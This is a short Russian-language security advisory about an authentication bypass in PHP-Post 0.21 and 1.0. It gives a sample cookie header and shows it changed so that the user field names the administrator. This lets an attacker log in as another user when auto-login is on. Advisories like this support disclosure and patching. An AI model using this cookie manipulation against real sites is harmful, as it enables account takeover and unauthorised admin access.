Программа: PHP-Post 0.21 и 1.0, возможно другие
версии.
Уязвимость позволяет удаленному
пользователю обойти некоторые ограничения
безопасности. Уязвимость существует из-за
недостаточной проверки данных при
включенной функции автоматического входа.
Удаленный пользователь может изменить
некоторые данные в файле куки и
авторизоваться в качестве другого
пользователя (например, администратора) в
приложении.
Пример:
Cookie: logincookie[pwd]=5a329326344d1d38; logincookie[user]=3nitr0;
logincookie[last]=2006-07-07+05%3A24%3A44; logincookie[lastv]=1152264284; post[329]=330
изменить на:
Cookie: logincookie[pwd]=5a329326344d1d38; logincookie[user]="ADMIN`S
USERNAME"; logincookie[last]=2006-07-07+05%3A24%3A44; logincookie[lastv]=1152264284;
post[329]=330
